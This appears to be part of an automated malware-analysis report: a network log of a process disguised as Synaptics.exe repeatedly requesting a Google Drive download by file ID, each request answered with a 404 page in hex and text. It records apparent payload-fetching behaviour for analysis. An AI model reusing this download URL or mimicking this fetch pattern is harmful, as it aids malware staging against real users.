                                                                                                                                                                                        2022-05-17 11:31:54 UTC558INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 4d 61 69 37 4a 58 34 6c 42 79 35 4f 56 35 79 4c 73 32 33 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yMai7JX4lBy5OV5yLs23lg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:54 UTC559INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:54 UTC559INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        183192.168.2.349955142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC556OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC560INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:54 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-G1XyBrJPwVlniqZ4PcRy8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC561INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:54 UTC561INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 74 41 6f 51 69 6a 6d 76 56 71 74 51 57 64 6c 68 75 42 58 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EtAoQijmvVqtQWdlhuBXug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:54 UTC562INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:54 UTC562INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        184192.168.2.349956142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC559OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC562INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:54 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8l93n3uJ6aEPDA5m2b1p1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC564INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 6f 68 37 76 41 46 43 70 4b 75 56 32 55 4b 54 75 59 41 72 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zoh7vAFCpKuV2UKTuYArHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:54 UTC565INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:54 UTC566INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        185192.168.2.349957142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC566OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        186192.168.2.349958142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC566OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        187192.168.2.349959142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC566OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC569INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:54 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-CDWpTKC1TUQ8eIrPkJLRlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC571INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 34 68 59 37 70 46 6d 55 51 34 70 66 35 6a 59 43 70 52 6e 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="c4hY7pFmUQ4pf5jYCpRnEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:54 UTC572INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:54 UTC572INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        188192.168.2.349960142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC566OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC566INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:54 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-UYSHMXCZkZv4s0Lbp23Neg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC568INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 7a 64 55 39 5a 4c 70 35 39 59 4f 6e 6c 4b 75 4d 45 4a 32 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tzdU9ZLp59YOnlKuMEJ2mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:54 UTC569INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:54 UTC569INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        189192.168.2.349961142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC569OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:55 UTC572INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:55 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5mOBa/kGIhDJylvlVtnSTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
